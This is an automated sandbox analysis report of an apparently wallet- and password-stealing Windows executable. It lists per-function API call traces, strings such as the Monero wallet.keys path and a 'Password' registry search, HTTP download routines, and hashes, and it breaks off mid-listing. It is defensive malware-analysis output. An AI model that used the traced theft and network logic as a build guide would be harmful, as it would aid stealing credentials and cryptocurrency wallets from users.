                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 1191620704-0
                                    • Opcode ID: da017c058fb2f294138a0ea1b89b15030ef27b9e8023dbd69d578e4640a9d96b
                                    • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                    • Opcode Fuzzy Hash: da017c058fb2f294138a0ea1b89b15030ef27b9e8023dbd69d578e4640a9d96b
                                    • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                    Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 00401327
                                      • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                      • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                      • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                      • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                      • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                    • lstrlenA.KERNEL32(?), ref: 0040135C
                                    • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00A14A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                    • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                    • memset.MSVCRT ref: 00401516
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 1930502592-218353709
                                    • Opcode ID: 8f1af44f0471db40cbeeb3acc638c17ebe6dcb10dd0f8b1439207695b066911b
                                    • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                    • Opcode Fuzzy Hash: 8f1af44f0471db40cbeeb3acc638c17ebe6dcb10dd0f8b1439207695b066911b
                                    • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                    Function 004152C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 138stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                      • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00A1B398), ref: 00406303
                                      • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                      • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,00A1A780,00000000,00000000,00400100,00000000), ref: 00406385
                                      • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                      • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                    • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                    • lstrlenA.KERNEL32(00000000), ref: 00415383
                                    • strtok.MSVCRT(00000000,?), ref: 0041539E
                                    • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3532888709-1526165396
                                    • Opcode ID: c3080ecd0a6d2aaa5a38b2191e54b3eb9af717d792ebc913c1fc0f2162e4d86d
                                    • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                    • Opcode Fuzzy Hash: c3080ecd0a6d2aaa5a38b2191e54b3eb9af717d792ebc913c1fc0f2162e4d86d
                                    • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                    Function 004060A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                    • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                    • StrCmpCA.SHLWAPI(?,00A1B398), ref: 00406147
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                    • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                    • InternetCloseHandle.WININET(a+A), ref: 00406253
                                    • InternetCloseHandle.WININET(00000000), ref: 00406260
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID: a+A$a+A
                                    • API String ID: 4287319946-2847607090
                                    • Opcode ID: c7bc458361b14762599541627539190d7fbcbcfe1bc678f5eaebc030e8ecc5e4
                                    • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                    • Opcode Fuzzy Hash: c7bc458361b14762599541627539190d7fbcbcfe1bc678f5eaebc030e8ecc5e4
                                    • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                    Function 007F0CC7 Relevance: 18.2, APIs: 12, Instructions: 205stringprocesssynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • memset.MSVCRT ref: 007F0E83
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F0E9C
                                    • lstrcat.KERNEL32(?,00420D7C), ref: 007F0EAE
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F0EC4
                                    • lstrcat.KERNEL32(?,00420D80), ref: 007F0ED6
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F0EEF
                                    • lstrcat.KERNEL32(?,00420D84), ref: 007F0F01
                                    • lstrlen.KERNEL32(?), ref: 007F0F0E
                                    • memset.MSVCRT ref: 007F0F34
                                    • memset.MSVCRT ref: 007F0F48
                                      • Part of subcall function 007FAA87: lstrlen.KERNEL32(007E516C,?,?,007E516C,00420DDE), ref: 007FAA92
                                      • Part of subcall function 007FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 007FAAEC
                                      • Part of subcall function 007F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,007E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 007F8DED
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,007F0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 007F9948
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 007F0FC1
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007F0FCD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                    • String ID:
                                    • API String ID: 1395395982-0
                                    • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                    • Instruction ID: d563fa4d4e3d1fa72517d51f55e0d28667d55a5633a922339e79e709b6086997
                                    • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                    • Instruction Fuzzy Hash: 398152F5540218EBCB14EBA0DD5AFFD7339AF54304F4041A9B30966192EE786B88CF5A
                                    Function 007F0CB6 Relevance: 18.2, APIs: 12, Instructions: 185stringprocesssynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • memset.MSVCRT ref: 007F0E83
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F0E9C
                                    • lstrcat.KERNEL32(?,00420D7C), ref: 007F0EAE
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F0EC4
                                    • lstrcat.KERNEL32(?,00420D80), ref: 007F0ED6
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F0EEF
                                    • lstrcat.KERNEL32(?,00420D84), ref: 007F0F01
                                    • lstrlen.KERNEL32(?), ref: 007F0F0E
                                    • memset.MSVCRT ref: 007F0F34
                                    • memset.MSVCRT ref: 007F0F48
                                      • Part of subcall function 007FAA87: lstrlen.KERNEL32(007E516C,?,?,007E516C,00420DDE), ref: 007FAA92
                                      • Part of subcall function 007FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 007FAAEC
                                      • Part of subcall function 007F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,007E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 007F8DED
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,007F0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 007F9948
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 007F0FC1
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007F0FCD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                    • String ID:
                                    • API String ID: 1395395982-0
                                    • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                    • Instruction ID: e55a230881a7b7b3055dc6d8b9eb2fdd4f33510cda32948fbf5f3c1b17b70ce1
                                    • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                    • Instruction Fuzzy Hash: 726182F554021CEBCB14EBA0DD5AFFD7738AF44304F4041A9B70966182EA786B88CF5A
                                    Function 007E4AE7 Relevance: 17.0, APIs: 11, Instructions: 479networkstringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A51
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A68
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A7F
                                      • Part of subcall function 007E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4AA0
                                      • Part of subcall function 007E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4AB0
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007E4B7C
                                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 007E4BA1
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E4D21
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 007E504F
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007E506B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 007E507F
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007E50B0
                                    • InternetCloseHandle.WININET(00000000), ref: 007E5114
                                    • InternetCloseHandle.WININET(00000000), ref: 007E512C
                                    • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 007E4D7C
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                    • InternetCloseHandle.WININET(00000000), ref: 007E5136
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID:
                                    • API String ID: 2402878923-0
                                    • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                    • Instruction ID: bb4d543341e881acc0d3ae4c8fa8160ff8fb16748c511b032d6d3cadcf473603
                                    • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                    • Instruction Fuzzy Hash: F612ADB191121CFACB15EB90DD66EFEB379AF15300F504199B20A62291DF782F88CF52
                                    Function 007E64E7 Relevance: 16.7, APIs: 11, Instructions: 191networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A51
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A68
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A7F
                                      • Part of subcall function 007E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4AA0
                                      • Part of subcall function 007E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4AB0
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 007E6548
                                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 007E656A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E659C
                                    • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 007E65EC
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007E6626
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E6638
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007E6664
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007E66D4
                                    • InternetCloseHandle.WININET(00000000), ref: 007E6756
                                    • InternetCloseHandle.WININET(00000000), ref: 007E6760
                                    • InternetCloseHandle.WININET(00000000), ref: 007E676A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID:
                                    • API String ID: 3074848878-0
                                    • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                    • Instruction ID: 404f4e4690358600eeb4e99eed16c0e136369f1a0313229020c01d00ff49e22a
                                    • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                    • Instruction Fuzzy Hash: 8B7161B5A40218EBDB24DFA0DC59FEE7775FB58700F108199F2096B290DBB86A84CF51
                                    Function 007F9277 Relevance: 16.7, APIs: 11, Instructions: 184COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007F92D3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID:
                                    • API String ID: 2244384528-0
                                    • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                    • Instruction ID: 7104d224c4365dd200be214312f4f7543c41ca91e4a6db8de5d12c8f2fdfd0b7
                                    • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                    • Instruction Fuzzy Hash: B071DBB9940208EBDB14DFE4DC89FEEB7B9BF59700F108508F615A7290DB78A905CB61
                                    Function 004170D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 136COMMON
                                    Download Yara Rule
                                    APIs
                                    • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                    • memset.MSVCRT ref: 0041716A
                                    • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                    Strings
                                    • sA, xrefs: 00417111
                                    • sA, xrefs: 004172AE, 00417179, 0041717C
                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: OpenProcesslstrcpymemset
                                    • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                    • API String ID: 224852652-2614523144
                                    • Opcode ID: 335029b319d1980603acda44a43de6eff4f01f1b596770656a511b732844fbe7
                                    • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                    • Opcode Fuzzy Hash: 335029b319d1980603acda44a43de6eff4f01f1b596770656a511b732844fbe7
                                    • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                    Function 007F7767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 007F77A9
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007F77E6
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F786A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F7871
                                    • wsprintfA.USER32 ref: 007F78A7
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\$B
                                    • API String ID: 1544550907-183544611
                                    • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                    • Instruction ID: 3e2b41fb714e65ba80b14e9c6bd12eadfa485790b6548101a65d402adc303487
                                    • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                    • Instruction Fuzzy Hash: B04183B1D04258EFDB14DF94CC59BEEB7B5EF48700F100199F605A7280D7796A84CBA6
                                    Function 004075D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                      • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                      • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                      • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
